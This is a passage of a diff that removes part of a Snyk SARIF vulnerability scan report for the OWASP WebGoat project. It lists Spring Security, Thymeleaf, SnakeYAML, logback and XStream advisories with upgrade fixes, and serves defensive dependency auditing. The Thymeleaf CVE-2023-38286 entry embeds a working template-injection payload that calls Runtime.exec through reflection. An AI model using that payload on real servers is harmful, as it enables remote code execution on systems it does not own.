-                "markdown": "* Package Manager: maven\n* Vulnerable module: org.springframework.security:spring-security-core\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT, org.springframework.boot:spring-boot-starter-oauth2-client@3.1.5 and others\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › org.springframework.boot:spring-boot-starter-oauth2-client@3.1.5 › org.springframework.security:spring-security-core@6.1.5\n# Overview\n[org.springframework.security:spring-security-core](http://spring.io/spring-security) is a package that provides security services for the Spring IO Platform.\n\nAffected versions of this package are vulnerable to Improper Access Control when the application uses `AuthenticatedVoter` directly and a `null` authentication parameter is passed to it. Exploiting this vulnerability resulting in an erroneous `true` return value.\r\n\r\n**Note**\r\n\r\nUsers are not affected if:\r\n\r\n1) The application does not use `AuthenticatedVoter#vote` directly.\r\n\r\n2) The application does not pass `null` to `AuthenticatedVoter#vote`.\n# Remediation\nUpgrade `org.springframework.security:spring-security-core` to version 5.7.12, 5.8.11, 6.0.10, 6.1.8, 6.2.3 or higher.\n# References\n- [GitHub Commit](https://github.com/spring-projects/spring-security/commit/a972338e1dacf82e9cbb669b04678e4d09eae695)\n- [GitHub Issue](https://github.com/spring-projects/spring-security/issues/14666)\n- [Security Advisory](https://spring.io/security/cve-2024-22257)\n"
-              },
-              "properties": {
-                "tags": [
-                  "security",
-                  "CWE-284",
-                  "maven"
-                ],
-                "cvssv3_baseScore": 8.2,
-                "security-severity": "8.2"
-              }
-            },
-            {
-              "id": "SNYK-JAVA-ORGSPRINGFRAMEWORKSECURITY-8309135",
-              "shortDescription": {
-                "text": "Critical severity - Missing Authorization vulnerability in org.springframework.security:spring-security-web"
-              },
-              "fullDescription": {
-                "text": "(CVE-2024-38821) org.springframework.security:spring-security-web@6.1.5"
-              },
-              "help": {
-                "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: org.springframework.security:spring-security-web\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT, org.springframework.boot:spring-boot-starter-security@3.1.5 and others\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › org.springframework.boot:spring-boot-starter-security@3.1.5 › org.springframework.security:spring-security-web@6.1.5\n# Overview\n[org.springframework.security:spring-security-web](https://mvnrepository.com/artifact/org.springframework.security/spring-security-web) is a package within Spring Security that provides security services for the Spring IO Platform.\n\nAffected versions of this package are vulnerable to Missing Authorization allowing Spring Security authorization rules to be bypassed for static resources.\r\n\r\n**Note:**\r\n\r\nNon-Static Resources Are Not Affected by this vulnerability. This is because handlers for these routes use predicates to validate the requests even if all security filters are bypassed. \r\n\r\nSpring Security states that for this to impact an application, all of the following conditions must be met:\r\n\r\n1) It must be a WebFlux application.\r\n\r\n2) It must be using Spring's static resources support.\r\n\r\n3) It must have a non-permitAll authorization rule applied to the static resources support.\n# Remediation\nUpgrade `org.springframework.security:spring-security-web` to version 5.7.13, 5.8.15, 6.2.7, 6.3.4 or higher.\n# References\n- [Blog](https://www.deep-kondah.com/spring-webflux-static-resource-access-vulnerability-cve-2024-38821-explained/)\n- [GitHub Commit](https://github.com/spring-projects/spring-security/commit/0e257b56ce35402558a260ffa6b368982f9a7934)\n- [GitHub Commit](https://github.com/spring-projects/spring-security/commit/4ce7cde15599c0447163fd46bac616e03318bf5b)\n- [PoC](https://github.com/mouadk/cve-2024-38821)\n- [Spring Security Advisory](https://spring.io/security/cve-2024-38821)\n"
-              },
-              "properties": {
-                "tags": [
-                  "security",
-                  "CWE-862",
-                  "maven"
-                ],
-                "cvssv3_baseScore": 9.1,
-                "security-severity": "9.1"
-              }
-            },
-            {
-              "id": "SNYK-JAVA-ORGSPRINGFRAMEWORKSECURITY-9486467",
-              "shortDescription": {
-                "text": "Critical severity - Authentication Bypass by Primary Weakness vulnerability in org.springframework.security:spring-security-crypto"
-              },
-              "fullDescription": {
-                "text": "(CVE-2025-22228) org.springframework.security:spring-security-crypto@6.1.5"
-              },
-              "help": {
-                "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: org.springframework.security:spring-security-crypto\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT, org.springframework.boot:spring-boot-starter-oauth2-client@3.1.5 and others\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › org.springframework.boot:spring-boot-starter-oauth2-client@3.1.5 › org.springframework.security:spring-security-core@6.1.5 › org.springframework.security:spring-security-crypto@6.1.5\n# Overview\n[org.springframework.security:spring-security-crypto](https://mvnrepository.com/artifact/org.springframework.security/spring-security-crypto) is a spring-security-crypto library for Spring Security.\n\nAffected versions of this package are vulnerable to Authentication Bypass by Primary Weakness in the `BCryptPasswordEncoder.matches()` function, which only takes the first 72 characters for comparison. Passwords longer than this will incorrectly return true when compared against other strings sharing the same first 72 characters, making them easier to brute force. \r\n\r\n**Note:** Patches have also been issued for older versions of Enterprise Support packages.\n# Remediation\nUpgrade `org.springframework.security:spring-security-crypto` to version 6.3.8, 6.4.4 or higher.\n# References\n- [GitHub Commit](https://github.com/spring-projects/spring-security/commit/46f0dc6dfc8402cd556c598fdf2d31f9d46cdbf3)\n- [Vulnerability Advisory](https://spring.io/security/cve-2025-22228)\n"
-              },
-              "properties": {
-                "tags": [
-                  "security",
-                  "CWE-305",
-                  "maven"
-                ],
-                "cvssv3_baseScore": 9,
-                "security-severity": "9.0"
-              }
-            },
-            {
-              "id": "SNYK-JAVA-ORGTHYMELEAF-5811866",
-              "shortDescription": {
-                "text": "Critical severity - Sandbox Bypass vulnerability in org.thymeleaf:thymeleaf"
-              },
-              "fullDescription": {
-                "text": "(CVE-2023-38286) org.thymeleaf:thymeleaf@3.1.1.RELEASE"
-              },
-              "help": {
-                "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: org.thymeleaf:thymeleaf\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT, org.springframework.boot:spring-boot-starter-thymeleaf@3.1.5 and others\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › org.springframework.boot:spring-boot-starter-thymeleaf@3.1.5 › org.thymeleaf:thymeleaf-spring6@3.1.1.RELEASE › org.thymeleaf:thymeleaf@3.1.1.RELEASE\n# Overview\n\nAffected versions of this package are vulnerable to Sandbox Bypass due to insufficient checks, by allowing an attacker to execute arbitrary code via a crafted HTML.\n# PoC\n```\r\n<!DOCTYPE html>\r\n<html xmlns:th=\"http://www.thymeleaf.org\">\r\n<head>\r\n    <meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\"/>\r\n</head>\r\n<body>\r\n\r\n<tr\r\n        th:with=\"getRuntimeMethod=${T(org.springframework.util.ReflectionUtils).findMethod(T(org.springframework.util.ClassUtils).forName('java.lang.Runtime',T(org.springframework.util.ClassUtils).getDefaultClassLoader()), 'getRuntime' )}\"\r\n>\r\n    <td>\r\n        <a\r\n                th:with=\"runtimeObj=${T(org.springframework.util.ReflectionUtils).invokeMethod(getRuntimeMethod, null)}\"\r\n        >\r\n            <a\r\n                    th:with=\"exeMethod=${T(org.springframework.util.ReflectionUtils).findMethod(T(org.springframework.util.ClassUtils).forName('java.lang.Runtime',T(org.springframework.util.ClassUtils).getDefaultClassLoader()), 'exec', ''.getClass() )}\"\r\n            >\r\n                <a\r\n                        th:with=\"param2=${T(org.springframework.util.ReflectionUtils).invokeMethod(exeMethod, runtimeObj, 'calc' )\r\n                }\"\r\n                        th:href=\"${param2}\"\r\n                ></a>\r\n            </a>\r\n\r\n        </a>\r\n    </td>\r\n</tr>\r\n\r\n</body>\r\n</html>\r\n```\n# Remediation\nUpgrade `org.thymeleaf:thymeleaf` to version 3.1.2.RELEASE or higher.\n# References\n- [GitHub Commit](https://github.com/thymeleaf/thymeleaf/issues/966)\n- [PoC](https://github.com/p1n93r/SpringBootAdmin-thymeleaf-SSTI)\n"
-              },
-              "properties": {
-                "tags": [
-                  "security",
-                  "CWE-265",
-                  "maven"
-                ],
-                "cvssv3_baseScore": 9.8,
-                "security-severity": "9.8"
-              }
-            },
-            {
-              "id": "SNYK-JAVA-ORGYAML-3152153",
-              "shortDescription": {
-                "text": "Medium severity - Arbitrary Code Execution vulnerability in org.yaml:snakeyaml"
-              },
-              "fullDescription": {
-                "text": "(CVE-2022-1471) org.yaml:snakeyaml@1.33"
-              },
-              "help": {
-                "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: org.yaml:snakeyaml\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT, org.springframework.boot:spring-boot-starter-validation@3.1.5 and others\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › org.springframework.boot:spring-boot-starter-validation@3.1.5 › org.springframework.boot:spring-boot-starter@3.1.5 › org.yaml:snakeyaml@1.33\n# Overview\n[org.yaml:snakeyaml](https://code.google.com/p/snakeyaml/source/browse/) is a YAML 1.1 parser and emitter for Java.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution in the `Constructor` class, which does not restrict which types can be deserialized. This vulnerability is exploitable by an attacker who provides a malicious YAML file for deserialization, which circumvents the `SafeConstructor` class. \r\n\r\nThe maintainers of the library contend that the application's trust would already have had to be compromised or established and therefore dispute the risk associated with this issue on the basis that there is a high bar for exploitation.\n# Remediation\nUpgrade `org.yaml:snakeyaml` to version 2.0 or higher.\n# References\n- [BitBucket Changelog](https://bitbucket.org/snakeyaml/snakeyaml/wiki/Changes)\n- [Bitbucket Commit](https://bitbucket.org/snakeyaml/snakeyaml/commits/2b8d47c8bcfd402e7a682b7b2674e8d0cb25e522)\n- [Bitbucket Issue](https://bitbucket.org/snakeyaml/snakeyaml/issues/561/cve-2022-1471-vulnerability-in)\n- [BitBucket Issue](https://bitbucket.org/snakeyaml/snakeyaml/issues/565/do-not-allow-global-tags-by-default)\n- [BitBucket PR](https://bitbucket.org/snakeyaml/snakeyaml/pull-requests/39)\n- [BitBucket PR](https://bitbucket.org/snakeyaml/snakeyaml/pull-requests/44)\n- [PoC](https://github.com/1fabunicorn/SnakeYAML-CVE-2022-1471-POC)\n- [Snyk Blog - Technical Deepdive](https://snyk.io/blog/unsafe-deserialization-snakeyaml-java-cve-2022-1471/)\n- [Vulnerable Class](https://github.com/snakeyaml/snakeyaml/blob/master/src/main/java/org/yaml/snakeyaml/constructor/Constructor.java)\n"
-              },
-              "properties": {
-                "tags": [
-                  "security",
-                  "CWE-20",
-                  "maven"
-                ],
-                "cvssv3_baseScore": 6.6,
-                "security-severity": "6.6"
-              }
-            },
-            {
-              "id": "snyk:lic:maven:ch.qos.logback:logback-classic:(EPL-1.0_OR_LGPL-2.1)",
-              "shortDescription": {
-                "text": "Medium severity - Dual license: EPL-1.0, LGPL-2.1 vulnerability in ch.qos.logback:logback-classic"
-              },
-              "fullDescription": {
-                "text": "ch.qos.logback:logback-classic@1.4.11"
-              },
-              "help": {
-                "text": "",
-                "markdown": "* Package Manager: maven\n* Module: ch.qos.logback:logback-classic\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT, org.springframework.boot:spring-boot-starter-validation@3.1.5 and others\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › org.springframework.boot:spring-boot-starter-validation@3.1.5 › org.springframework.boot:spring-boot-starter@3.1.5 › org.springframework.boot:spring-boot-starter-logging@3.1.5 › ch.qos.logback:logback-classic@1.4.11\nDual license: EPL-1.0, LGPL-2.1"
-              },
-              "properties": {
-                "tags": [
-                  "security",
-                  "maven"
-                ]
-              }
-            },
-            {
-              "id": "snyk:lic:maven:ch.qos.logback:logback-core:(EPL-1.0_OR_LGPL-2.1)",
-              "shortDescription": {
-                "text": "Medium severity - Dual license: EPL-1.0, LGPL-2.1 vulnerability in ch.qos.logback:logback-core"
-              },
-              "fullDescription": {
-                "text": "ch.qos.logback:logback-core@1.4.11"
-              },
-              "help": {
-                "text": "",
-                "markdown": "* Package Manager: maven\n* Module: ch.qos.logback:logback-core\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT, org.springframework.boot:spring-boot-starter-validation@3.1.5 and others\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › org.springframework.boot:spring-boot-starter-validation@3.1.5 › org.springframework.boot:spring-boot-starter@3.1.5 › org.springframework.boot:spring-boot-starter-logging@3.1.5 › ch.qos.logback:logback-classic@1.4.11 › ch.qos.logback:logback-core@1.4.11\nDual license: EPL-1.0, LGPL-2.1"
-              },
-              "properties": {
-                "tags": [
-                  "security",
-                  "maven"
-                ]
-              }
-            },
-            {
-              "id": "snyk:lic:maven:com.github.jnr:jnr-posix:(EPL-1.0_OR_GPL-2.0_OR_LGPL-2.1)",
-              "shortDescription": {
-                "text": "High severity - Multiple licenses: EPL-1.0, GPL-2.0, LGPL-2.1 vulnerability in com.github.jnr:jnr-posix"
-              },
-              "fullDescription": {
-                "text": "com.github.jnr:jnr-posix@3.1.17"
-              },
-              "help": {
-                "text": "",
-                "markdown": "* Package Manager: maven\n* Module: com.github.jnr:jnr-posix\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT, org.asciidoctor:asciidoctorj@2.5.10 and others\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › org.asciidoctor:asciidoctorj@2.5.10 › org.jruby:jruby@9.4.3.0 › org.jruby:jruby-base@9.4.3.0 › com.github.jnr:jnr-posix@3.1.17\nMultiple licenses: EPL-1.0, GPL-2.0, LGPL-2.1"
-              },
-              "properties": {
-                "tags": [
-                  "security",
-                  "maven"
-                ]
-              }
-            },
-            {
-              "id": "snyk:lic:maven:org.hibernate.common:hibernate-commons-annotations:LGPL-2.1",
-              "shortDescription": {
-                "text": "Medium severity - LGPL-2.1 license vulnerability in org.hibernate.common:hibernate-commons-annotations"
-              },
-              "fullDescription": {
-                "text": "org.hibernate.common:hibernate-commons-annotations@6.0.6.Final"
-              },
-              "help": {
-                "text": "",
-                "markdown": "* Package Manager: maven\n* Module: org.hibernate.common:hibernate-commons-annotations\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT, org.springframework.boot:spring-boot-starter-data-jpa@3.1.5 and others\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › org.springframework.boot:spring-boot-starter-data-jpa@3.1.5 › org.hibernate.orm:hibernate-core@6.2.13.Final › org.hibernate.common:hibernate-commons-annotations@6.0.6.Final\nLGPL-2.1 license"
-              },
-              "properties": {
-                "tags": [
-                  "security",
-                  "maven"
-                ]
-              }
-            },
-            {
-              "id": "snyk:lic:maven:org.hibernate.orm:hibernate-core:LGPL-2.1",
-              "shortDescription": {
-                "text": "Medium severity - LGPL-2.1 license vulnerability in org.hibernate.orm:hibernate-core"
-              },
-              "fullDescription": {
-                "text": "org.hibernate.orm:hibernate-core@6.2.13.Final"
-              },
-              "help": {
-                "text": "",
-                "markdown": "* Package Manager: maven\n* Module: org.hibernate.orm:hibernate-core\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT, org.springframework.boot:spring-boot-starter-data-jpa@3.1.5 and others\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › org.springframework.boot:spring-boot-starter-data-jpa@3.1.5 › org.hibernate.orm:hibernate-core@6.2.13.Final\nLGPL-2.1 license"
-              },
-              "properties": {
-                "tags": [
-                  "security",
-                  "maven"
-                ]
-              }
-            },
-            {
-              "id": "snyk:lic:maven:org.jruby:dirgra:EPL-1.0",
-              "shortDescription": {
-                "text": "Medium severity - EPL-1.0 license vulnerability in org.jruby:dirgra"
-              },
-              "fullDescription": {
-                "text": "org.jruby:dirgra@0.3"
-              },
-              "help": {
-                "text": "",
-                "markdown": "* Package Manager: maven\n* Module: org.jruby:dirgra\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT, org.asciidoctor:asciidoctorj@2.5.10 and others\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › org.asciidoctor:asciidoctorj@2.5.10 › org.jruby:jruby@9.4.3.0 › org.jruby:jruby-base@9.4.3.0 › org.jruby:dirgra@0.3\nEPL-1.0 license"
-              },
-              "properties": {
-                "tags": [
-                  "security",
-                  "maven"
-                ]
-              }
-            }
-          ]
-        }
-      },
-      "results": [
-        {
-          "ruleId": "SNYK-JAVA-CHQOSLOGBACK-13169722",
-          "level": "warning",
-          "message": {
-            "text": "This file introduces a vulnerable ch.qos.logback:logback-core package with a medium severity vulnerability."
-          },
-          "locations": [
-            {
-              "physicalLocation": {
-                "artifactLocation": {
-                  "uri": "pom.xml"
-                },
-                "region": {
-                  "startLine": 1
-                }
-              },
-              "logicalLocations": [
-                {
-                  "fullyQualifiedName": "ch.qos.logback:logback-core@1.4.11"
-                }
-              ]
-            }
-          ],
-          "fixes": [
-            {
-              "description": {
-                "text": "Upgrade to org.springframework.boot:spring-boot-starter-validation@3.4.11"
-              },
-              "artifactChanges": [
-                {
-                  "artifactLocation": {
-                    "uri": "pom.xml"
-                  },
-                  "replacements": [
-                    {
-                      "deletedRegion": {
-                        "startLine": 1
-                      },
-                      "insertedContent": {
-                        "text": "org.springframework.boot:spring-boot-starter-validation@3.4.11"
-                      }
-                    }
-                  ]
-                }
-              ]
-            }
-          ]
-        },
-        {
-          "ruleId": "SNYK-JAVA-CHQOSLOGBACK-6094942",
-          "level": "error",
-          "message": {
-            "text": "This file introduces a vulnerable ch.qos.logback:logback-classic package with a high severity vulnerability."
-          },
-          "locations": [
-            {
-              "physicalLocation": {
-                "artifactLocation": {
-                  "uri": "pom.xml"
-                },
-                "region": {
-                  "startLine": 1
-                }
-              },
-              "logicalLocations": [
-                {
-                  "fullyQualifiedName": "ch.qos.logback:logback-classic@1.4.11"
-                }
-              ]
-            }
-          ],
-          "fixes": [
-            {
-              "description": {
-                "text": "Upgrade to org.springframework.boot:spring-boot-starter-validation@3.1.7"
-              },
-              "artifactChanges": [
-                {
-                  "artifactLocation": {
-                    "uri": "pom.xml"
-                  },
-                  "replacements": [
-                    {
-                      "deletedRegion": {
-                        "startLine": 1
-                      },
-                      "insertedContent": {
-                        "text": "org.springframework.boot:spring-boot-starter-validation@3.1.7"
-                      }
-                    }
-                  ]
-                }
-              ]
-            }
-          ]
-        },
-        {
-          "ruleId": "SNYK-JAVA-CHQOSLOGBACK-6094943",
-          "level": "error",
-          "message": {
-            "text": "This file introduces a vulnerable ch.qos.logback:logback-core package with a high severity vulnerability."
-          },
-          "locations": [
-            {
-              "physicalLocation": {
-                "artifactLocation": {
-                  "uri": "pom.xml"
-                },
-                "region": {
-                  "startLine": 1
-                }
-              },
-              "logicalLocations": [
-                {
-                  "fullyQualifiedName": "ch.qos.logback:logback-core@1.4.11"
-                }
-              ]
-            }
-          ],
-          "fixes": [
-            {
-              "description": {
-                "text": "Upgrade to org.springframework.boot:spring-boot-starter-validation@3.1.7"
-              },
-              "artifactChanges": [
-                {
-                  "artifactLocation": {
-                    "uri": "pom.xml"
-                  },
-                  "replacements": [
-                    {
-                      "deletedRegion": {
-                        "startLine": 1
-                      },
-                      "insertedContent": {
-                        "text": "org.springframework.boot:spring-boot-starter-validation@3.1.7"
-                      }
-                    }
-                  ]
-                }
-              ]
-            }
-          ]
-        },
-        {
-          "ruleId": "SNYK-JAVA-CHQOSLOGBACK-6097492",
-          "level": "error",
-          "message": {
-            "text": "This file introduces a vulnerable ch.qos.logback:logback-classic package with a high severity vulnerability."
-          },
-          "locations": [
-            {
-              "physicalLocation": {
-                "artifactLocation": {
-                  "uri": "pom.xml"
-                },
-                "region": {
-                  "startLine": 1
-                }
-              },
-              "logicalLocations": [
-                {
-                  "fullyQualifiedName": "ch.qos.logback:logback-classic@1.4.11"
-                }
-              ]
-            }
-          ],
-          "fixes": [
-            {
-              "description": {
-                "text": "Upgrade to org.springframework.boot:spring-boot-starter-validation@3.1.7"
-              },
-              "artifactChanges": [
-                {
-                  "artifactLocation": {
-                    "uri": "pom.xml"
-                  },
-                  "replacements": [
-                    {
-                      "deletedRegion": {
-                        "startLine": 1
-                      },
-                      "insertedContent": {
-                        "text": "org.springframework.boot:spring-boot-starter-validation@3.1.7"
-                      }
-                    }
-                  ]
-                }
-              ]
-            }
-          ]
-        },
-        {
-          "ruleId": "SNYK-JAVA-CHQOSLOGBACK-6097493",
-          "level": "error",
-          "message": {
-            "text": "This file introduces a vulnerable ch.qos.logback:logback-core package with a high severity vulnerability."
-          },
-          "locations": [
-            {
-              "physicalLocation": {
-                "artifactLocation": {
-                  "uri": "pom.xml"
-                },
-                "region": {
-                  "startLine": 1
-                }
-              },
-              "logicalLocations": [
-                {
-                  "fullyQualifiedName": "ch.qos.logback:logback-core@1.4.11"
-                }
-              ]
-            }
-          ],
-          "fixes": [
-            {
-              "description": {
-                "text": "Upgrade to org.springframework.boot:spring-boot-starter-validation@3.1.7"
-              },
-              "artifactChanges": [
-                {
-                  "artifactLocation": {
-                    "uri": "pom.xml"
-                  },
-                  "replacements": [
-                    {
-                      "deletedRegion": {
-                        "startLine": 1
-                      },
-                      "insertedContent": {
-                        "text": "org.springframework.boot:spring-boot-starter-validation@3.1.7"
-                      }
-                    }
-                  ]
-                }
-              ]
-            }
-          ]
-        },
-        {
-          "ruleId": "SNYK-JAVA-CHQOSLOGBACK-8539865",
-          "level": "note",
-          "message": {
-            "text": "This file introduces a vulnerable ch.qos.logback:logback-core package with a low severity vulnerability."
-          },
-          "locations": [
-            {
-              "physicalLocation": {
-                "artifactLocation": {
-                  "uri": "pom.xml"
-                },
-                "region": {
-                  "startLine": 1
-                }
-              },
-              "logicalLocations": [
-                {
-                  "fullyQualifiedName": "ch.qos.logback:logback-core@1.4.11"
-                }
-              ]
-            }
-          ],
-          "fixes": [
-            {
-              "description": {
-                "text": "Upgrade to org.springframework.boot:spring-boot-starter-validation@3.3.8"
-              },
-              "artifactChanges": [
-                {
-                  "artifactLocation": {
-                    "uri": "pom.xml"
-                  },
-                  "replacements": [
-                    {
-                      "deletedRegion": {
-                        "startLine": 1
-                      },
-                      "insertedContent": {
-                        "text": "org.springframework.boot:spring-boot-starter-validation@3.3.8"
-                      }
-                    }
-                  ]
-                }
-              ]
-            }
-          ]
-        },
-        {
-          "ruleId": "SNYK-JAVA-CHQOSLOGBACK-8539866",
-          "level": "warning",
-          "message": {
-            "text": "This file introduces a vulnerable ch.qos.logback:logback-core package with a medium severity vulnerability."
-          },
-          "locations": [
-            {
-              "physicalLocation": {
-                "artifactLocation": {
-                  "uri": "pom.xml"
-                },
-                "region": {
-                  "startLine": 1
-                }
-              },
-              "logicalLocations": [
-                {
-                  "fullyQualifiedName": "ch.qos.logback:logback-core@1.4.11"
-                }
-              ]
-            }
-          ],
-          "fixes": [
-            {
-              "description": {
-                "text": "Upgrade to org.springframework.boot:spring-boot-starter-validation@3.3.8"
-              },
-              "artifactChanges": [
-                {
-                  "artifactLocation": {
-                    "uri": "pom.xml"
-                  },
-                  "replacements": [
-                    {
-                      "deletedRegion": {
-                        "startLine": 1
-                      },
-                      "insertedContent": {
-                        "text": "org.springframework.boot:spring-boot-starter-validation@3.3.8"
-                      }
-                    }
-                  ]
-                }
-              ]
-            }
-          ]
-        },
-        {
-          "ruleId": "SNYK-JAVA-CHQOSLOGBACK-8539867",
-          "level": "warning",
-          "message": {
-            "text": "This file introduces a vulnerable ch.qos.logback:logback-classic package with a medium severity vulnerability."
-          },
-          "locations": [
-            {
-              "physicalLocation": {
-                "artifactLocation": {
-                  "uri": "pom.xml"
-                },
-                "region": {
-                  "startLine": 1
-                }
-              },
-              "logicalLocations": [
-                {
-                  "fullyQualifiedName": "ch.qos.logback:logback-classic@1.4.11"
-                }
-              ]
-            }
-          ],
-          "fixes": [
-            {
-              "description": {
-                "text": "Upgrade to org.springframework.boot:spring-boot-starter-validation@3.3.8"
-              },
-              "artifactChanges": [
-                {
-                  "artifactLocation": {
-                    "uri": "pom.xml"
-                  },
-                  "replacements": [
-                    {
-                      "deletedRegion": {
-                        "startLine": 1
-                      },
-                      "insertedContent": {
-                        "text": "org.springframework.boot:spring-boot-starter-validation@3.3.8"
-                      }
-                    }
-                  ]
-                }
-              ]
-            }
-          ]
-        },
-        {
-          "ruleId": "SNYK-JAVA-COMNIMBUSDS-10691768",
-          "level": "warning",
-          "message": {
-            "text": "This file introduces a vulnerable com.nimbusds:nimbus-jose-jwt package with a medium severity vulnerability."
-          },
-          "locations": [
-            {
-              "physicalLocation": {
-                "artifactLocation": {
-                  "uri": "pom.xml"
-                },
-                "region": {
-                  "startLine": 1
-                }
-              },
-              "logicalLocations": [
-                {
-                  "fullyQualifiedName": "com.nimbusds:nimbus-jose-jwt@9.24.4"
-                }
-              ]
-            }
-          ],
-          "fixes": [
-            {
-              "description": {
-                "text": "Upgrade to org.springframework.boot:spring-boot-starter-oauth2-client@3.4.10"
-              },
-              "artifactChanges": [
-                {
-                  "artifactLocation": {
-                    "uri": "pom.xml"
-                  },
-                  "replacements": [
-                    {
-                      "deletedRegion": {
-                        "startLine": 1
-                      },
-                      "insertedContent": {
-                        "text": "org.springframework.boot:spring-boot-starter-oauth2-client@3.4.10"
-                      }
-                    }
-                  ]
-                }
-              ]
-            }
-          ]
-        },
-        {
-          "ruleId": "SNYK-JAVA-COMNIMBUSDS-6247633",
-          "level": "error",
-          "message": {
-            "text": "This file introduces a vulnerable com.nimbusds:nimbus-jose-jwt package with a high severity vulnerability."
-          },
-          "locations": [
-            {
-              "physicalLocation": {
-                "artifactLocation": {
-                  "uri": "pom.xml"
-                },
-                "region": {
-                  "startLine": 1
-                }
-              },
-              "logicalLocations": [
-                {
-                  "fullyQualifiedName": "com.nimbusds:nimbus-jose-jwt@9.24.4"
-                }
-              ]
-            }
-          ],
-          "fixes": [
-            {
-              "description": {
-                "text": "Upgrade to org.springframework.boot:spring-boot-starter-oauth2-client@3.2.7"
-              },
-              "artifactChanges": [
-                {
-                  "artifactLocation": {
-                    "uri": "pom.xml"
-                  },
-                  "replacements": [
-                    {
-                      "deletedRegion": {
-                        "startLine": 1
-                      },
-                      "insertedContent": {
-                        "text": "org.springframework.boot:spring-boot-starter-oauth2-client@3.2.7"
-                      }
-                    }
-                  ]
-                }
-              ]
-            }
-          ]
-        },
-        {
-          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1040458",
-          "level": "error",
-          "message": {
-            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a high severity vulnerability."
-          },
-          "locations": [
-            {
-              "physicalLocation": {
-                "artifactLocation": {
-                  "uri": "pom.xml"
-                },
-                "region": {
-                  "startLine": 1
-                }
-              },
-              "logicalLocations": [
-                {
-                  "fullyQualifiedName": "com.thoughtworks.xstream:xstream@1.4.5"
-                }
-              ]
-            }
-          ],
-          "fixes": [
-            {
-              "description": {
-                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.14"
-              },
-              "artifactChanges": [
-                {
-                  "artifactLocation": {
-                    "uri": "pom.xml"
-                  },
-                  "replacements": [
-                    {
-                      "deletedRegion": {
-                        "startLine": 1
-                      },
-                      "insertedContent": {
-                        "text": "com.thoughtworks.xstream:xstream@1.4.14"
-                      }
-                    }
-                  ]
-                }
-              ]
-            }
-          ]
-        },
-        {
-          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1051966",
-          "level": "warning",
-          "message": {
-            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a medium severity vulnerability."
-          },
-          "locations": [
-            {
-              "physicalLocation": {
-                "artifactLocation": {
-                  "uri": "pom.xml"
-                },
-                "region": {
-                  "startLine": 1
-                }
-              },
-              "logicalLocations": [
-                {
-                  "fullyQualifiedName": "com.thoughtworks.xstream:xstream@1.4.5"
-                }
-              ]
-            }
-          ],
-          "fixes": [
-            {
-              "description": {
-                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.15"
-              },
-              "artifactChanges": [
-                {
-                  "artifactLocation": {
-                    "uri": "pom.xml"
-                  },
-                  "replacements": [
-                    {
-                      "deletedRegion": {
-                        "startLine": 1
-                      },
-                      "insertedContent": {
-                        "text": "com.thoughtworks.xstream:xstream@1.4.15"
-                      }
-                    }
-                  ]
-                }
-              ]
-            }
-          ]
-        },
-        {
-          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1051967",
-          "level": "warning",
-          "message": {
-            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a medium severity vulnerability."
-          },
-          "locations": [
-            {
-              "physicalLocation": {
-                "artifactLocation": {
-                  "uri": "pom.xml"
-                },
-                "region": {
-                  "startLine": 1
-                }
-              },
-              "logicalLocations": [
-                {
-                  "fullyQualifiedName": "com.thoughtworks.xstream:xstream@1.4.5"
-                }
-              ]
-            }
-          ],
-          "fixes": [
-            {
-              "description": {
-                "text": "Upgrade to com.thoughtworks.xstream:xstream@1.4.15"
-              },
-              "artifactChanges": [
-                {
-                  "artifactLocation": {
-                    "uri": "pom.xml"
-                  },
-                  "replacements": [
-                    {
-                      "deletedRegion": {
-                        "startLine": 1
-                      },
-                      "insertedContent": {
-                        "text": "com.thoughtworks.xstream:xstream@1.4.15"
-                      }
-                    }
-                  ]
-                }
-              ]
-            }
-          ]
-        },
-        {
-          "ruleId": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1088328",
-          "level": "warning",
-          "message": {
-            "text": "This file introduces a vulnerable com.thoughtworks.xstream:xstream package with a medium severity vulnerability."
-          },
-          "locations": [
-            {
-              "physicalLocation": {
-                "artifactLocation": {
